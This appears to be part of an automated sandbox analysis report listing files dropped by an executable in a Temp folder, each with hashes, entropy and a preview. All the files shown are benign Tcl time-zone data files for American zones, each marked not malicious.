                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Maceio) {. {-9223372036854775808 -8572 0 LMT}. {-1767217028 -10800 0 BRT}. {-1206957600 -7200 1 BRST}. {-1191362400 -10800 0 BRT}. {-1175374800 -7200 1 BRST}. {-1159826400 -10800 0 BRT}. {-633819600 -7200 1 BRST}. {-622069200 -10800 0 BRT}. {-602283600 -7200 1 BRST}. {-591832800 -10800 0 BRT}. {-570747600 -7200 1 BRST}. {-560210400 -10800 0 BRT}. {-539125200 -7200 1 BRST}. {-531352800 -10800 0 BRT}. {-191365200 -7200 1 BRST}. {-184197600 -10800 0 BRT}. {-155163600 -7200 1 BRST}. {-150069600 -10800 0 BRT}. {-128898000 -7200 1 BRST}. {-121125600 -10800 0 BRT}. {-99954000 -7200 1 BRST}. {-89589600 -10800 0 BRT}. {-68418000 -7200 1 BRST}. {-57967200 -10800 0 BRT}. {499748400 -7200 1 BRST}. {511236000 -10800 0 BRT}. {530593200 -7200 1 BRST}. {540266400 -10800 0 BRT}. {562129200 -7200 1 BRST}. {571197600 -10800 0 BRT}. {592974000 -7200
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):590
                                                                                                                                                                                                                                                    Entropy (8bit):4.233264210289004
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Managua) {. {-9223372036854775808 -20708 0 LMT}. {-2524500892 -20712 0 MMT}. {-1121105688 -21600 0 CST}. {105084000 -18000 0 EST}. {161758800 -21600 0 CST}. {290584800 -18000 1 CDT}. {299134800 -21600 0 CST}. {322034400 -18000 1 CDT}. {330584400 -21600 0 CST}. {694260000 -18000 0 EST}. {717310800 -21600 0 CST}. {725868000 -18000 0 EST}. {852094800 -21600 0 CST}. {1113112800 -18000 1 CDT}. {1128229200 -21600 0 CST}. {1146384000 -18000 1 CDT}. {1159682400 -21600 0 CST}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1142
                                                                                                                                                                                                                                                    Entropy (8bit):4.001810227798472
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Manaus) {. {-9223372036854775808 -14404 0 LMT}. {-1767211196 -14400 0 AMT}. {-1206954000 -10800 1 AMST}. {-1191358800 -14400 0 AMT}. {-1175371200 -10800 1 AMST}. {-1159822800 -14400 0 AMT}. {-633816000 -10800 1 AMST}. {-622065600 -14400 0 AMT}. {-602280000 -10800 1 AMST}. {-591829200 -14400 0 AMT}. {-570744000 -10800 1 AMST}. {-560206800 -14400 0 AMT}. {-539121600 -10800 1 AMST}. {-531349200 -14400 0 AMT}. {-191361600 -10800 1 AMST}. {-184194000 -14400 0 AMT}. {-155160000 -10800 1 AMST}. {-150066000 -14400 0 AMT}. {-128894400 -10800 1 AMST}. {-121122000 -14400 0 AMT}. {-99950400 -10800 1 AMST}. {-89586000 -14400 0 AMT}. {-68414400 -10800 1 AMST}. {-57963600 -14400 0 AMT}. {499752000 -10800 1 AMST}. {511239600 -14400 0 AMT}. {530596800 -10800 1 AMST}. {540270000 -14400 0 AMT}. {562132800 -10800 1 AMST}. {571201200 -14400 0 AMT}. {5
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):202
                                                                                                                                                                                                                                                    Entropy (8bit):4.890561068654966
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Port_of_Spain)]} {. LoadTimeZoneFile America/Port_of_Spain.}.set TZData(:America/Marigot) $TZData(:America/Port_of_Spain).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):242
                                                                                                                                                                                                                                                    Entropy (8bit):4.7982301339896285
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Martinique) {. {-9223372036854775808 -14660 0 LMT}. {-2524506940 -14660 0 FFMT}. {-1851537340 -14400 0 AST}. {323841600 -10800 1 ADT}. {338958000 -14400 0 AST}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):6526
                                                                                                                                                                                                                                                    Entropy (8bit):3.7582526108760064
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Matamoros) {. {-9223372036854775808 -24000 0 LMT}. {-1514743200 -21600 0 CST}. {568015200 -21600 0 CST}. {576057600 -18000 1 CDT}. {594198000 -21600 0 CST}. {599637600 -21600 0 CST}. {828864000 -18000 1 CDT}. {846399600 -21600 0 CST}. {860313600 -18000 1 CDT}. {877849200 -21600 0 CST}. {891763200 -18000 1 CDT}. {909298800 -21600 0 CST}. {923212800 -18000 1 CDT}. {941353200 -21600 0 CST}. {954662400 -18000 1 CDT}. {972802800 -21600 0 CST}. {989136000 -18000 1 CDT}. {1001833200 -21600 0 CST}. {1018166400 -18000 1 CDT}. {1035702000 -21600 0 CST}. {1049616000 -18000 1 CDT}. {1067151600 -21600 0 CST}. {1081065600 -18000 1 CDT}. {1099206000 -21600 0 CST}. {1112515200 -18000 1 CDT}. {1130655600 -21600 0 CST}. {1143964800 -18000 1 CDT}. {1162105200 -21600 0 CST}. {1175414400 -18000 1 CDT}. {1193554800 -21600 0 CST}. {1207468800 -18000 1 C
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):6619
                                                                                                                                                                                                                                                    Entropy (8bit):3.788952004807415
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Mazatlan) {. {-9223372036854775808 -25540 0 LMT}. {-1514739600 -25200 0 MST}. {-1343066400 -21600 0 CST}. {-1234807200 -25200 0 MST}. {-1220292000 -21600 0 CST}. {-1207159200 -25200 0 MST}. {-1191344400 -21600 0 CST}. {-873828000 -25200 0 MST}. {-661539600 -28800 0 PST}. {28800 -25200 0 MST}. {828867600 -21600 1 MDT}. {846403200 -25200 0 MST}. {860317200 -21600 1 MDT}. {877852800 -25200 0 MST}. {891766800 -21600 1 MDT}. {909302400 -25200 0 MST}. {923216400 -21600 1 MDT}. {941356800 -25200 0 MST}. {954666000 -21600 1 MDT}. {972806400 -25200 0 MST}. {989139600 -21600 1 MDT}. {1001836800 -25200 0 MST}. {1018170000 -21600 1 MDT}. {1035705600 -25200 0 MST}. {1049619600 -21600 1 MDT}. {1067155200 -25200 0 MST}. {1081069200 -21600 1 MDT}. {1099209600 -25200 0 MST}. {1112518800 -21600 1 MDT}. {1130659200 -25200 0 MST}. {1143968400 -21600
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):214
                                                                                                                                                                                                                                                    Entropy (8bit):4.76389929825594
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6:SlSWB9IZaM3y7/MBVAIgp/Ma290zpH+90/MI:MBaIMY/Mcp/Ma290zpe90/MI
                                                                                                                                                                                                                                                    MD5:A6EFD8F443D4CB54A5FB238D4D975808
                                                                                                                                                                                                                                                    SHA1:8F25C6C0EA9D73DC8D1964C4A28A4E2E783880CC
                                                                                                                                                                                                                                                    SHA-256:39B34B406339F06A8D187F8CCC1B6BF2550E49329F7DCE223619190F560E75F8
                                                                                                                                                                                                                                                    SHA-512:4B5D48472D56AF19B29AD2377573CC8CB3ED9EF1AF53C00C907B6576FA852EA3D1E9F9B3A78A280DC44F8ADBE5B81D6AEC2609BE08FFA08507CD0F4139878F46
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Argentina/Mendoza)]} {. LoadTimeZoneFile America/Argentina/Mendoza.}.set TZData(:America/Mendoza) $TZData(:America/Argentina/Mendoza).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):8136
                                                                                                                                                                                                                                                    Entropy (8bit):3.7460641906933345
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:oXxj07ffkeTzZSJw5/9/yuvQ+hcrD57X0N41+IestuNEbYkzbXwDTIRqfhXbdXvC:oXxj07ffNTzZSJw5/9/yuvQ6crD57X0w
                                                                                                                                                                                                                                                    MD5:0D0DC4A816CDAE4707CDF4DF51A18D30
                                                                                                                                                                                                                                                    SHA1:7ED2835AA8F723B958A6631092019A779554CADE
                                                                                                                                                                                                                                                    SHA-256:3C659C1EAC7848BBE8DF00F857F8F81D2F64B56BD1CEF3495641C53C007434FA
                                                                                                                                                                                                                                                    SHA-512:930F2FDC2C1EAE4106F9B37A16BCBBAF618A2CCBBA98C712E8215555CF09B9303D71842DEC38EFAF930DB71E14E8208B14E41E10B54EF98335E01435D0FC3518
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Menominee) {. {-9223372036854775808 -21027 0 LMT}. {-2659759773 -21600 0 CST}. {-1633276800 -18000 1 CDT}. {-1615136400 -21600 0 CST}. {-1601827200 -18000 1 CDT}. {-1583686800 -21600 0 CST}. {-880214400 -18000 1 CWT}. {-769395600 -18000 1 CPT}. {-765392400 -21600 0 CST}. {-757360800 -21600 0 CST}. {-747244800 -18000 1 CDT}. {-733942800 -21600 0 CST}. {-116438400 -18000 1 CDT}. {-100112400 -21600 0 CST}. {-21484800 -18000 0 EST}. {104914800 -21600 0 CST}. {104918400 -18000 1 CDT}. {120639600 -21600 0 CST}. {126691200 -18000 1 CDT}. {152089200 -21600 0 CST}. {162374400 -18000 1 CDT}. {183538800 -21600 0 CST}. {199267200 -18000 1 CDT}. {215593200 -21600 0 CST}. {230716800 -18000 1 CDT}. {247042800 -21600 0 CST}. {262771200 -18000 1 CDT}. {278492400 -21600 0 CST}. {294220800 -18000 1 CDT}. {309942000 -21600 0 CST}. {325670400 -18000 1
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):6435
                                                                                                                                                                                                                                                    Entropy (8bit):3.757504464563519
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:gN41+z6stuNEsRZjWqZL/1dCYDXEaXTuXMEXiH4RxGIJkYWXsWwav7jNf4sOVEmR:gN41+z6stuNEsRZjWqZL/1dCYDDCxyHo
                                                                                                                                                                                                                                                    MD5:A7C5CFE3FA08D4CEDF6324457EA5766E
                                                                                                                                                                                                                                                    SHA1:83BB96398C0B1B34771940C8F7A19CB78C5EF72F
                                                                                                                                                                                                                                                    SHA-256:A1D7DE7285DC78ADDE1B0A04E05DA44D0D46D4696F67A682D0D28313A53825FE
                                                                                                                                                                                                                                                    SHA-512:092DD7CEF6A5861472965E082171937EEDCFB3AE1821E3C88AA1BDFAB1EC48F765CAC497E3E5C78C19653C78B087C7CE28A8AB76F9073558963234901EF4B4A4
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Merida) {. {-9223372036854775808 -21508 0 LMT}. {-1514743200 -21600 0 CST}. {377935200 -18000 0 EST}. {407653200 -21600 0 CST}. {828864000 -18000 1 CDT}. {846399600 -21600 0 CST}. {860313600 -18000 1 CDT}. {877849200 -21600 0 CST}. {891763200 -18000 1 CDT}. {909298800 -21600 0 CST}. {923212800 -18000 1 CDT}. {941353200 -21600 0 CST}. {954662400 -18000 1 CDT}. {972802800 -21600 0 CST}. {989136000 -18000 1 CDT}. {1001833200 -21600 0 CST}. {1018166400 -18000 1 CDT}. {1035702000 -21600 0 CST}. {1049616000 -18000 1 CDT}. {1067151600 -21600 0 CST}. {1081065600 -18000 1 CDT}. {1099206000 -21600 0 CST}. {1112515200 -18000 1 CDT}. {1130655600 -21600 0 CST}. {1143964800 -18000 1 CDT}. {1162105200 -21600 0 CST}. {1175414400 -18000 1 CDT}. {1193554800 -21600 0 CST}. {1207468800 -18000 1 CDT}. {1225004400 -21600 0 CST}. {1238918400 -18000 1 CD
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1223
                                                                                                                                                                                                                                                    Entropy (8bit):4.043351581198227
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:cQG6JeNYesEmlJ14Rs/a4H/YDmD1bSSs8TZZTnEjnz4pUV/NbQKmScg/kg6TgJTQ:5OYvP06z9N1e5udJ
                                                                                                                                                                                                                                                    MD5:B33AB48A35A25DD80C13604A13869520
                                                                                                                                                                                                                                                    SHA1:CD62F2EBD1BA4197E7D2923E9B984EB862EFA46E
                                                                                                                                                                                                                                                    SHA-256:DDF7AD896370189E67E9CA9017661541181C1901F56DC4954015175412C506CA
                                                                                                                                                                                                                                                    SHA-512:99C3F043A921C1E34E1A9CC8D7D5B0D043BBEAC565F3E55E7618C06C1686CF00BF9E2CB4D9AB3C0625E9E41DD2C0B40706D4FA106F006A710B117C7A86075FD9
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Metlakatla) {. {-9223372036854775808 54822 0 LMT}. {-3225366822 -31578 0 LMT}. {-2188955622 -28800 0 PST}. {-883584000 -28800 0 PST}. {-880207200 -25200 1 PWT}. {-769395600 -25200 1 PPT}. {-765385200 -28800 0 PST}. {-757353600 -28800 0 PST}. {-31507200 -28800 0 PST}. {-21477600 -25200 1 PDT}. {-5756400 -28800 0 PST}. {9972000 -25200 1 PDT}. {25693200 -28800 0 PST}. {41421600 -25200 1 PDT}. {57747600 -28800 0 PST}. {73476000 -25200 1 PDT}. {89197200 -28800 0 PST}. {104925600 -25200 1 PDT}. {120646800 -28800 0 PST}. {126698400 -25200 1 PDT}. {152096400 -28800 0 PST}. {162381600 -25200 1 PDT}. {183546000 -28800 0 PST}. {199274400 -25200 1 PDT}. {215600400 -28800 0 PST}. {230724000 -25200 1 PDT}. {247050000 -28800 0 PST}. {262778400 -25200 1 PDT}. {278499600 -28800 0 PST}. {294228000 -25200 1 PDT}. {309949200 -28800 0 PST}. {325677
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):6807
                                                                                                                                                                                                                                                    Entropy (8bit):3.761365047166545
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:VeE7nN41+zKstuNEsRZjWqZL/1dCYDXEaXTuXMEXiH4RxGIJkYWXsWwav7jNf4sQ:VeE7nN41+zKstuNEsRZjWqZL/1dCYDDK
                                                                                                                                                                                                                                                    MD5:C675DA8A44A9841C417C585C2661EF13
                                                                                                                                                                                                                                                    SHA1:147DDE5DD00E520DA889AC9931088E6232CE6FEA
                                                                                                                                                                                                                                                    SHA-256:82B9AAD03408A9DFC0B6361EC923FEAEF97DBB4B3129B772B902B9DAE345D63E
                                                                                                                                                                                                                                                    SHA-512:00615A5EC0D08BABF009C3CAAF3D631B1F4E2E4324E91B0F29ADD7E61B51C80D5D495D20BD131A9370C3005B2E510C8A4E4869A5032D82BC33C875E909CDE086
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Mexico_City) {. {-9223372036854775808 -23796 0 LMT}. {-1514739600 -25200 0 MST}. {-1343066400 -21600 0 CST}. {-1234807200 -25200 0 MST}. {-1220292000 -21600 0 CST}. {-1207159200 -25200 0 MST}. {-1191344400 -21600 0 CST}. {-975261600 -18000 1 CDT}. {-963169200 -21600 0 CST}. {-917114400 -18000 1 CDT}. {-907354800 -21600 0 CST}. {-821901600 -18000 1 CWT}. {-810068400 -21600 0 CST}. {-627501600 -18000 1 CDT}. {-612990000 -21600 0 CST}. {828864000 -18000 1 CDT}. {846399600 -21600 0 CST}. {860313600 -18000 1 CDT}. {877849200 -21600 0 CST}. {891763200 -18000 1 CDT}. {909298800 -21600 0 CST}. {923212800 -18000 1 CDT}. {941353200 -21600 0 CST}. {954662400 -18000 1 CDT}. {972802800 -21600 0 CST}. {989136000 -18000 1 CDT}. {1001836800 -21600 0 CST}. {1014184800 -21600 0 CST}. {1018166400 -18000 1 CDT}. {1035702000 -21600 0 CST}. {1049616000
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):7074
                                                                                                                                                                                                                                                    Entropy (8bit):3.8399423763277087
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:FtGlRdJVKU7c7q5lynu9b4HwXz+SqgNyz0T2CKm8qHmqpiq21PjgDCghEpW12YXq:ExKZ651i
                                                                                                                                                                                                                                                    MD5:3BE359FC305B39DE06AEBC7E1DA63F42
                                                                                                                                                                                                                                                    SHA1:1F4DD606C5CC277DACC7678E8B82A9C8E8ACDD4F
                                                                                                                                                                                                                                                    SHA-256:BB8E349500B467FE8F2670AF36F8237C12B513CF2832005E70281309C3AA057A
                                                                                                                                                                                                                                                    SHA-512:85017DFFF1BDE833737AF09673CB9001E7EFD10B7C7E83659D425150E11BD1FA56DF8DEC921DB279A853C0379CC15E720BFBB109A8100A3B3D1B4030128BB34A
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Miquelon) {. {-9223372036854775808 -13480 0 LMT}. {-1850328920 -14400 0 AST}. {326001600 -10800 0 PMST}. {536468400 -10800 0 PMST}. {544597200 -7200 1 PMDT}. {562132800 -10800 0 PMST}. {576046800 -7200 1 PMDT}. {594187200 -10800 0 PMST}. {607496400 -7200 1 PMDT}. {625636800 -10800 0 PMST}. {638946000 -7200 1 PMDT}. {657086400 -10800 0 PMST}. {671000400 -7200 1 PMDT}. {688536000 -10800 0 PMST}. {702450000 -7200 1 PMDT}. {719985600 -10800 0 PMST}. {733899600 -7200 1 PMDT}. {752040000 -10800 0 PMST}. {765349200 -7200 1 PMDT}. {783489600 -10800 0 PMST}. {796798800 -7200 1 PMDT}. {814939200 -10800 0 PMST}. {828853200 -7200 1 PMDT}. {846388800 -10800 0 PMST}. {860302800 -7200 1 PMDT}. {877838400 -10800 0 PMST}. {891752400 -7200 1 PMDT}. {909288000 -10800 0 PMST}. {923202000 -7200 1 PMDT}. {941342400 -10800 0 PMST}. {954651600 -7200 1 PM
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):10165
                                                                                                                                                                                                                                                    Entropy (8bit):3.73501024949866
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Moncton) {. {-9223372036854775808 -15548 0 LMT}. {-2715882052 -18000 0 EST}. {-2131642800 -14400 0 AST}. {-1632074400 -10800 1 ADT}. {-1615143600 -14400 0 AST}. {-1167595200 -14400 0 AST}. {-1153681200 -10800 1 ADT}. {-1145822400 -14400 0 AST}. {-1122231600 -10800 1 ADT}. {-1114372800 -14400 0 AST}. {-1090782000 -10800 1 ADT}. {-1082923200 -14400 0 AST}. {-1059332400 -10800 1 ADT}. {-1051473600 -14400 0 AST}. {-1027882800 -10800 1 ADT}. {-1020024000 -14400 0 AST}. {-996433200 -10800 1 ADT}. {-988574400 -14400 0 AST}. {-965674800 -10800 1 ADT}. {-955396800 -14400 0 AST}. {-934743600 -10800 1 ADT}. {-923947200 -14400 0 AST}. {-904503600 -10800 1 ADT}. {-891892800 -14400 0 AST}. {-883598400 -14400 0 AST}. {-880221600 -10800 1 AWT}. {-769395600 -10800 1 APT}. {-765399600 -14400 0 AST}. {-757368000 -14400 0 AST}. {-747252000 -10800 1 ADT}
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):6496
                                                                                                                                                                                                                                                    Entropy (8bit):3.75909042772931
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Monterrey) {. {-9223372036854775808 -24076 0 LMT}. {-1514743200 -21600 0 CST}. {568015200 -21600 0 CST}. {576057600 -18000 1 CDT}. {594198000 -21600 0 CST}. {599637600 -21600 0 CST}. {828864000 -18000 1 CDT}. {846399600 -21600 0 CST}. {860313600 -18000 1 CDT}. {877849200 -21600 0 CST}. {891763200 -18000 1 CDT}. {909298800 -21600 0 CST}. {923212800 -18000 1 CDT}. {941353200 -21600 0 CST}. {954662400 -18000 1 CDT}. {972802800 -21600 0 CST}. {989136000 -18000 1 CDT}. {1001833200 -21600 0 CST}. {1018166400 -18000 1 CDT}. {1035702000 -21600 0 CST}. {1049616000 -18000 1 CDT}. {1067151600 -21600 0 CST}. {1081065600 -18000 1 CDT}. {1099206000 -21600 0 CST}. {1112515200 -18000 1 CDT}. {1130655600 -21600 0 CST}. {1143964800 -18000 1 CDT}. {1162105200 -21600 0 CST}. {1175414400 -18000 1 CDT}. {1193554800 -21600 0 CST}. {1207468800 -18000 1 C
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2743
                                                                                                                                                                                                                                                    Entropy (8bit):3.9155970425124305
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Montevideo) {. {-9223372036854775808 -13484 0 LMT}. {-2256668116 -13484 0 MMT}. {-1567455316 -12600 0 UYT}. {-1459542600 -10800 1 UYHST}. {-1443819600 -12600 0 UYT}. {-1428006600 -10800 1 UYHST}. {-1412283600 -12600 0 UYT}. {-1396470600 -10800 1 UYHST}. {-1380747600 -12600 0 UYT}. {-1141590600 -10800 1 UYHST}. {-1128286800 -12600 0 UYT}. {-1110141000 -10800 1 UYHST}. {-1096837200 -12600 0 UYT}. {-1078691400 -10800 1 UYHST}. {-1065387600 -12600 0 UYT}. {-1046637000 -10800 1 UYHST}. {-1033938000 -12600 0 UYT}. {-1015187400 -10800 1 UYHST}. {-1002488400 -12600 0 UYT}. {-983737800 -10800 1 UYHST}. {-971038800 -12600 0 UYT}. {-952288200 -10800 1 UYHST}. {-938984400 -12600 0 UYT}. {-920838600 -10800 1 UYHST}. {-907534800 -12600 0 UYT}. {-896819400 -10800 1 UYHST}. {-853623000 -10800 0 UYT}. {-853621200 -7200 1 UYST}. {-845848800 -10800 0 UYT}
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):185
                                                                                                                                                                                                                                                    Entropy (8bit):4.696915330047381
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Toronto)]} {. LoadTimeZoneFile America/Toronto.}.set TZData(:America/Montreal) $TZData(:America/Toronto).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):205
                                                                                                                                                                                                                                                    Entropy (8bit):4.865859395466201
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Port_of_Spain)]} {. LoadTimeZoneFile America/Port_of_Spain.}.set TZData(:America/Montserrat) $TZData(:America/Port_of_Spain).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):8260
                                                                                                                                                                                                                                                    Entropy (8bit):3.7353311910027376
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Nassau) {. {-9223372036854775808 -18570 0 LMT}. {-1825095030 -18000 0 EST}. {-179341200 -14400 1 EDT}. {-163620000 -18000 0 EST}. {-147891600 -14400 1 EDT}. {-131565600 -18000 0 EST}. {-116442000 -14400 1 EDT}. {-100116000 -18000 0 EST}. {-84387600 -14400 1 EDT}. {-68666400 -18000 0 EST}. {-52938000 -14400 1 EDT}. {-37216800 -18000 0 EST}. {-21488400 -14400 1 EDT}. {-5767200 -18000 0 EST}. {9961200 -14400 1 EDT}. {25682400 -18000 0 EST}. {41410800 -14400 1 EDT}. {57736800 -18000 0 EST}. {73465200 -14400 1 EDT}. {89186400 -18000 0 EST}. {104914800 -14400 1 EDT}. {120636000 -18000 0 EST}. {136364400 -14400 1 EDT}. {152085600 -18000 0 EST}. {167814000 -14400 1 EDT}. {183535200 -18000 0 EST}. {189320400 -18000 0 EST}. {199263600 -14400 1 EDT}. {215589600 -18000 0 EST}. {230713200 -14400 1 EDT}. {247039200 -18000 0 EST}. {262767600
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):11004
                                                                                                                                                                                                                                                    Entropy (8bit):3.725417189649631
                                                                                                                                                                                                                                                    Encrypted:false
